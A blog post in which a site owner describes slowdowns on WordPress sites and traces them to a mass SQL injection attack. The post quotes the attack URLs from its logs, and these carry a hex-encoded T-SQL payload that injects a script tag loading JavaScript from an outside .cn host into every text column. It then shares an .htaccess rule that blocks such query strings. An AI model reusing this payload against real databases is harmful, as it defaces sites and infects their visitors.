Probable DDOS attack Using SQL Injection on my Websites

Over the last day, my sites have been really slow and twice to my knowledge have tripped out.  I’ve been getting a mysql error message like so when I try to resolve the problem in phpAdmin;

MySQL: ERROR 1040: Too many connections

I tried hosting chat support (as I’m in a hurry) but the connection kept dropping.  During this process Google came to the fore and pushed me down several avenues of investigation.

This was one result, http://rackerhacker.com/2008/06/24/mysql-error-1040-too-many-connections/ from the web, and another from the horse’s mouth http://dev.mysql.com/doc/refman/5.0/en/too-many-connections.html

I then proceeded to check my WordPress plugins but couldn’t because the server wasn’t responding.  When it finally fired back up after quarter of an hour (!), I immediately disabled some OpenID plugins I’ve been playing with on one site and checked my databases were okay.

They were, but during the process I noticed that Wassup was the biggest table – unusually so.  Looking at some of the references in an extended list in the GUI, I noticed that several (random, as far as I could tell), post addresses were extre-e-e-e-e-mely long, terminating in some form of code.  Like so (It’s manually wrapped to fit into my theme);

http://strangelyperfect.tv/68/70s-mixer/?;DECLARE%20@S%20

CHAR(4000);SET%20@S=CAST(0x4445434C4152452040542

07661726368617228323535292C4043207661726368617

2283430303029204445434C415245205461626C655F437

572736F7220435552534F5220464F522073656C65637420

612E6E616D652C622E6E616D652066726F6D207379736F

626A6563747320612C737973636F6C756D6E7320622077

6865726520612E69643D622E696420616E6420612E7874

7970653D27752720616E642028622E78747970653D3939

206F7220622E78747970653D3335206F7220622E787479

70653D323331206F7220622E78747970653D313637292

04F50454E205461626C655F437572736F7220464554434

8204E4558542046524F4D20205461626C655F437572736

F7220494E544F2040542C4043205748494C45284040464

55443485F5354415455533D302920424547494E206578

65632827757064617465205B272B40542B275D2073657

4205B272B40432B275D3D2727223E3C2F7469746C653E3

C736372697074207372633D22687474703A2F2F777777

302E646F7568756E716E2E636E2F63737273732F772E6A7

3223E3C2F7363726970743E3C212D2D27272B5B272B404

32B275D20776865726520272B40432B27206E6F74206C69

6B6520272725223E3C2F7469746C653E3C73637269707420

7372633D22687474703A2F2F777777302E646F7568756E

716E2E636E2F63737273732F772E6A73223E3C2F7363726

970743E3C212D2D272727294645544348204E455854204

6524F4D20205461626C655F437572736F7220494E544F20

40542C404320454E4420434C4F5345205461626C655F43

7572736F72204445414C4C4F43415445205461626C655F

437572736F72%20AS%20CHAR(4000));EXEC(@S);  (addendum: clickable link removed as I’m using this plugin now)

If you copy & paste and try the link it won’t work now (read on for later ;-) ) but the correct link here does;

http://strangelyperfect.tv/68/70s-mixer/

Before my fix, the first link took the user to the correct page and it displayed in the browser address bar with the long link.  My suspicions were now being raised because the page displayed okay.  This must be all the WordPress updating I’ve done.  It was a couple of updates back the the thing had some SQL Injection resistance built in.  It appears to fall over gracefully by ignoring duff requests.

So I chucked the “extra” part of the link into Google like so.   There are over 6k hits.

These posts got me thinking:

http://www.unsoughtinput.com/index.php/2006/11/09/comment-spam-deluge-did-our-captcha-get-hacked/

http://treyford.wordpress.com/2008/04/30/scary-mass-sql-attack/

http://www.thejoyofcode.com/Stop_trying_to_hack_me.aspx

and a neat fix that I’ve implemented I found here.

http://ravenphpscripts.com/postp122652.html (link removed as they’ve gone a bit funny all of a sudden)

What I’ve done is added the suggested code to my .htaccess file, like so:

# Added, protect from SQL Injection (sourced from) http://ravenphpscripts.com/postp122652.html
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.+DECLARE(%20)+@ [NC]
RewriteRule ^.* – [F,L]

This has done the trick.  Anything banging into my site with that in the string, is rejected.  I haven’t implemented a polite screen.  It just gets the standard response from my host as you’d have found with the first of my links above.

It’ll probably need twiddling in future but it’s okay for now.

Another similar link was:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre

/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434

C415245204054207661726368617228323535292C4043207

6617263686172283430303029204445434C4152452054616

26C655F437572736F7220435552534F5220464F522073656C

65637420612E6E616D652C622E6E616D652066726F6D2073

79736F626A6563747320612C737973636F6C756D6E732062

20776865726520612E69643D622E696420616E6420612E78

747970653D27752720616E642028622E78747970653D3939

206F7220622E78747970653D3335206F7220622E787479706

53D323331206F7220622E78747970653D31363729204F5045

4E205461626C655F437572736F72204645544348204E45585

42046524F4D20205461626C655F437572736F7220494E544F

2040542C4043205748494C4528404046455443485F535441

5455533D302920424547494E206578656328277570646174

65205B272B40542B275D20736574205B272B40432B275D3D

2727223E3C2F7469746C653E3C736372697074207372633D

22687474703A2F2F777777302E646F7568756E716E2E636E2

F63737273732F772E6A73223E3C2F7363726970743E3C212D

2D27272B5B272B40432B275D20776865726520272B40432B

27206E6F74206C696B6520272725223E3C2F7469746C653E3

C736372697074207372633D22687474703A2F2F777777302

E646F7568756E716E2E636E2F63737273732F772E6A73223E

3C2F7363726970743E3C212D2D272727294645544348204E

4558542046524F4D20205461626C655F437572736F722049

4E544F2040542C404320454E4420434C4F5345205461626C

655F437572736F72204445414C4C4F43415445205461626C6

55F437572736F72%20AS%20CHAR(4000));EXEC(@S);

which should point to:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

This was especially troublesome as the post title was long anyway so it looked in the browser address bar that everything was okay!

Comments are closed.

© 2007-2014 Strangely Perfect All Rights Reserved